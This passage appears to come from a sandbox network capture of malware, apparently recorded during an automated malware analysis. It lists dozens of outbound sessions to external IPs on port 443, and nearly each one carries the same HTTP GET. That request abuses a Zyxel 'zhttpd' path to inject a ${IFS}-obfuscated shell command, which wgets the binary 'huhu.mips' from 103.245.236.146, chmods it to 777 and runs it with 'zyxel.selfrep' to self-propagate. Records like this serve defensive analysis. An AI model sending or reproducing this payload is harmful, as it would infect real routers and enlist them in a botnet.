                                              Jan 29, 2024 07:03:02.556257010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              417192.168.2.1453068133.179.5.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556294918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              418192.168.2.145324058.79.120.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556338072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              419192.168.2.1459808190.203.60.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556385994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              420192.168.2.144865640.213.77.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556436062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              421192.168.2.1448980122.248.62.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556457043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              422192.168.2.145978254.6.208.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556498051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              423192.168.2.1434854107.233.77.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556538105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              424192.168.2.1459670166.11.34.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556564093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              425192.168.2.1443746163.231.122.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556590080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              426192.168.2.145172823.74.191.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556624889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              427192.168.2.1454478153.241.202.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556626081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              428192.168.2.1452366207.216.214.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556678057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              429192.168.2.144775289.161.37.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556708097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              430192.168.2.1447462167.88.17.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556766987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              431192.168.2.1438720179.24.81.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556819916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              432192.168.2.14534948.197.43.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556895971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              433192.168.2.1458658117.243.251.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556921959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              434192.168.2.144442039.82.166.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556996107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              435192.168.2.1449466211.217.56.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557058096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              436192.168.2.1453544111.78.208.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557079077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              437192.168.2.1434952173.246.78.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557112932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              438192.168.2.1456420160.109.181.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557152033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              439192.168.2.1437292221.25.99.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557179928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              440192.168.2.1436690112.157.130.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557231903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              441192.168.2.1445386168.111.151.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557267904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              442192.168.2.1442048164.243.194.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557313919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              443192.168.2.1433126201.165.30.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557363987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              444192.168.2.1435694195.100.32.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557410955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              445192.168.2.145369470.73.144.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557440042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              446192.168.2.1440300108.99.83.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557495117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              447192.168.2.1436886218.24.175.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557509899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              448192.168.2.14334461.18.109.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557552099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              449192.168.2.1441850167.199.47.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557612896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              450192.168.2.144211047.123.46.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557646990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              451192.168.2.1444192162.135.152.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557686090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              452192.168.2.144537699.227.136.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557745934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              453192.168.2.1457580147.55.218.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557800055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              454192.168.2.145180269.41.233.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557832956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              455192.168.2.145903674.232.147.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557868958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              456192.168.2.1437308136.140.129.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557904005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              457192.168.2.1444206178.249.39.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557940960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              458192.168.2.1434158193.184.234.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.557962894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              459192.168.2.1448602102.180.54.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558012009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              460192.168.2.145817073.67.141.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558068037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              461192.168.2.1437414111.92.91.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558116913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              462192.168.2.145525271.220.11.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558144093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              463192.168.2.145882246.213.57.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558216095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              464192.168.2.144147069.1.152.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558264971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              465192.168.2.1454904115.215.177.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558306932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              466192.168.2.1440780203.153.49.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558334112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              467192.168.2.1459484222.161.164.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558391094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              468192.168.2.144727677.176.85.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558424950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              469192.168.2.145054285.197.15.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558449030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              470192.168.2.145982044.249.186.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558482885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              471192.168.2.1448562195.186.142.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558551073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              472192.168.2.1454454110.151.116.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558551073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              473192.168.2.143351220.104.144.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558597088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              474192.168.2.1457760217.187.127.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558626890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              475192.168.2.1457240218.27.51.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558630943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              476192.168.2.1450128119.236.73.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558705091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              477192.168.2.144311895.253.132.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558715105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              478192.168.2.145870059.156.253.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558748007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              479192.168.2.1446968190.28.47.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558775902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              480192.168.2.1449866190.130.213.24443
                                              TimestampBytes transferredDirectionData
